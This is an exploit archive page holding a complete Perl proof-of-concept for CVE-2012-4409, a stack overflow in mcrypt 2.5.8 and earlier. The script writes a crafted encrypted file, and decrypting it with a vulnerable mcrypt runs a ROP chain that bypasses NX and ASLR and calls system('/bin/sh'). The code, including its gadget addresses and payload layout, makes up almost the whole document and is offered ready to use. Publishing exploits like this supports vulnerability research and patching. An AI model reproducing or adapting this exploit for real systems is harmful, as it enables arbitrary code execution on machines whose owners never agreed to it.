exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mcrypt 2.5.8 Stack Based Overflow

mcrypt 2.5.8 Stack Based Overflow
Posted Nov 26, 2012
Authored by Tosh

mcrypt versions 2.5.8 and below stack based overflow exploit. Bypasses NX and ASLR protections.

tags | exploit, overflow
advisories | CVE-2012-4409
SHA-256 | 6f15e1bd074af02d183bab2a865cd5bf95ecee50e01396c6679bc20335f5266b
Download | Favorite | View

mcrypt 2.5.8 Stack Based Overflow

Change Mirror Download
#!/usr/bin/perl
 
# Title          : mcrypt <= 2.5.8 STACK based overflow
# Date           : 23/11/2012
# Exploit Author : Tosh
# CVE            : CVE-2012-4409
# Patch          : http://www.openwall.com/lists/oss-security/2012/09/06/8
# Tested on      : Archlinux 3.6.6-1, without SSP
 
 
# This script exploit a stack based overflow in mcrypt <= 2.5.8.
# It bypass NX and ASLR protections, but no SSP.
 
# This exploit craft a crypted file and arbitrary code may be executed if the file is decrypted with a vulnerable version
# of mcrypt. The vulnerable function is check_file_head(), present in src/extra.c. See the CVE details or the patch for more
# informations.
 
# Payload must be adjusted on others plateforms, here is just a Proof of Concept :)
 
use strict;
use warnings;
 
my $filename = 'fake.nc';
 
my $file;
my $payload;
 
print "[+] Build payload.\n";
$payload = payload();
 
print "[+] Build file.\n";
$file = build_file($payload);
 
print "[+] Writing $filename.\n";
write_file();
 
print "[+] DONE.\n";
 
sub write_file {
    die("[-] Can't open $filename : $!\n") unless(open F, '>', $filename);
    print F $file;
    close F;
}
 
sub build_file {
# magic
    $file .= "\x00m\x03";
 
# flags
    $file .= pack('C', 1 << 6);
 
# algorithm
    $file .= "H\@Ck3d\x00";
 
# keysize
    $file .= pack('S', 0xdead);
 
# mode
    $file .= "h\@cK3d\x00";
 
# keymode
    $file .= "H\@CK3D\x00";
 
# sflags
    $file .= "\xff";
 
# payload
    $file .= $_[0];
     
    return $file;
}
 
sub payload {
    my $saved_eip_off = 0x71;       # Buffer len for overwrite saved EIP
    my $v_local_1     = 0x0805b000; # Local variable 1 overwriten
    my $v_local_2     = 0x08048007; # Local variable 2 overwriten
    my $ret_sled      = 5;          # Offset between saved EIP and local variables
    my $strcpy_plt    = 0x080499f0; # strcpy@plt address
    my $fopen64_got   = 0x0805b1c8; # fopen64 got entry
    my $system_off    = 0xfffd6b30; # fopen64 - system
    my $w_mem         = 0x0805b000; # writable memory, without ASLR
 
    my $pop2_ret      = 0x08055a63; # pop; pop; ret
    my $ret           = 0x0805a5ed; # ret
    my $pop_ebx       = 0x08056186; # pop ebx; ret
    my $pop_edi       = 0x08053460; # pop edi; ret
    my $xchg_eax      = 0x080517a4; # xchg eax, edi; ret
    my $add_eax       = 0x0804dabf; # add eax,[ebx-0x2776e73c]; pop ebx; ret
    my $call_eax      = 0x0804b357; # call eax; leave; ret
 
    my $payload;
 
    $payload .= "A"x$saved_eip_off;
    $payload .= pack('L', $ret) x $ret_sled;
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $v_local_1);
    $payload .= pack('L', $v_local_2);
 
# Copy  "/bin/" in +W memory
    $payload .= pack('L', $strcpy_plt);
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $w_mem + 0x00);
    $payload .= pack('L', 0x08057fc2);
 
# Copy "sh" + "\x00" in +W memory
    $payload .= pack('L', $strcpy_plt);
    $payload .= pack('L', $pop2_ret);
    $payload .= pack('L', $w_mem + 0x05);
    $payload .= pack('L', 0x08048bab);
 
# Calc system() address with fopen64 GOT entry
    $payload .= pack('L', $pop_ebx);
    $payload .= pack('L', $fopen64_got + 0x2776e73c);
 
    $payload .= pack('L', $pop_edi);
    $payload .= pack('L', $system_off);
 
    $payload .= pack('L', $xchg_eax);
 
    $payload .= pack('L', $add_eax);
    $payload .= "HaCk";
 
# Call system("/bin/sh")
    $payload .= pack('L', $call_eax);
    $payload .= pack('L', $w_mem);
 
    die("[-] Payload too long !\n") if(length $payload > 0xfe);
    return $payload;
}


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close